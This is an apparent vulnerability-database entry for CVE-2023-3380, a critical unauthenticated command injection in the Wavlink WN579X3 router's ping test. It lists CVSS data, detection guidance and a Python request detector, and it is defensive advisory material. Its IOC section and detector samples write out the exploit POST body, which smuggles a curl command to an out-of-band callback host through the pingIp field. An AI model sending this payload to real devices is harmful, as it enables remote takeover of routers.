cbcvebase.
CVE-2023-3380
published 2023-06-23

Priority: P271 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 3.88% (88.9th percentile)

A vulnerability classified as critical has been found in Wavlink WN579X3 up to 20230615. Affected is an unknown function of the file /cgi-bin/adm.cgi of the component Ping Test. The manipulation of the argument pingIp leads to injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-232236. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

Affected

2 ranges

Vendor | Product | Version range | Fixed in
wavlink | wn579x3 | |
wavlink | wn579x3_firmware | <= 2023-06-15 |

Detection & IOCs (extracted from sources)

path: /cgi-bin/adm.cgi
command: POST /cgi-bin/adm.cgi HTTP/1.1
command: page=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}}
path: /ping.shtml

  • Fingerprint target by checking for WAVLINK-specific strings in the HTTP response body before attempting exploitation.
  • Detect exploitation attempts by monitoring POST requests to /cgi-bin/adm.cgi with the parameter 'pingIp' containing shell metacharacters (e.g., semicolons, encoded as %3B) indicative of command injection.
  • Alert on POST requests to /cgi-bin/adm.cgi with Content-Type: application/x-www-form-urlencoded and body containing 'page=ping_test' combined with shell injection characters in the pingIp parameter.
  • Use Shodan to identify exposed WAVLINK WN579X3 devices for proactive asset discovery and patching prioritization.
  • The vulnerability is unauthenticated (PR:N), so any external IP can trigger it — monitor for unexpected outbound connections (e.g., curl/wget) originating from the router process after a POST to adm.cgi.
  • The exploit payload uses an out-of-band interaction (interactsh) to confirm RCE; detection based solely on HTTP response status 200 is insufficient, and OOB callback monitoring is required for reliable confirmation.
  • The vulnerability affects Wavlink WN579X3 firmware up to version 20230615; devices on this or earlier firmware versions are confirmed vulnerable.
  • The Nuclei template uses a two-step flow: first confirming the target is a WAVLINK device, then sending the exploit. Single-step detections without the fingerprint check may produce false positives.
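
The request-level detection described in the notes above (POST to /cgi-bin/adm.cgi, page=ping_test, shell metacharacters in pingIp), as an added example that is not part of the original page or of the Nuclei template. It generalizes the semicolon check to any pingIp value that is not a plain IP address or hostname; the function names, the allowlist pattern and the sample requests are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

TARGET_PATH = "/cgi-bin/adm.cgi"
# Assumption: a legitimate ping target is an IPv4 address or hostname only.
SAFE_TARGET = re.compile(r"[A-Za-z0-9.\-]{1,253}")
# Characters reported to the analyst when the allowlist check fails.
SHELL_META = set(";|&`$()<>\n\r\\'\"{} ")

def inspect_request(method, path, content_type, body):
    """Return a finding dict for a suspicious ping_test request, else None."""
    if method.upper() != "POST" or path.split("?", 1)[0] != TARGET_PATH:
        return None
    if "application/x-www-form-urlencoded" not in content_type.lower():
        return None
    # parse_qs percent-decodes values, so %3B becomes ';' and '+' becomes ' '.
    fields = parse_qs(body, keep_blank_values=True)
    if "ping_test" not in fields.get("page", []):
        return None
    for value in fields.get("pingIp", []):
        if SAFE_TARGET.fullmatch(value):
            continue  # plain address or hostname, nothing to report
        meta = sorted(c for c in set(value) if c in SHELL_META)
        return {"rule": "CVE-2023-3380 pingIp injection attempt",
                "pingIp": value, "metacharacters": meta}
    return None

# Constructed sample requests: (method, path, content type, body).
FORM = "application/x-www-form-urlencoded"
SAMPLES = [
    ("POST", "/cgi-bin/adm.cgi", FORM,
     "page=ping_test&CCMD=4&pingIp=192.0.2.10"),
    ("POST", "/cgi-bin/adm.cgi", FORM,
     "page=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl"
     "+http%3A%2F%2Fcallback.example.invalid"),
    ("GET", "/ping.shtml", "", ""),
]

def scan(samples=SAMPLES):
    """Run the check over every sample and return the findings in order."""
    return [inspect_request(*s) for s in samples]

if __name__ == "__main__":
    for sample, finding in zip(SAMPLES, scan()):
        print(sample[0], sample[1], "->", finding or "ok")
```

Matching on the decoded value against an allowlist catches encoded and unencoded metacharacters alike; it is a request-side signal and does not replace the outbound-connection monitoring noted above.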

CVSS provenance

nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 5.8 | MEDIUM | AV:N/AC:L/Au:M/C:P/I:P/A:P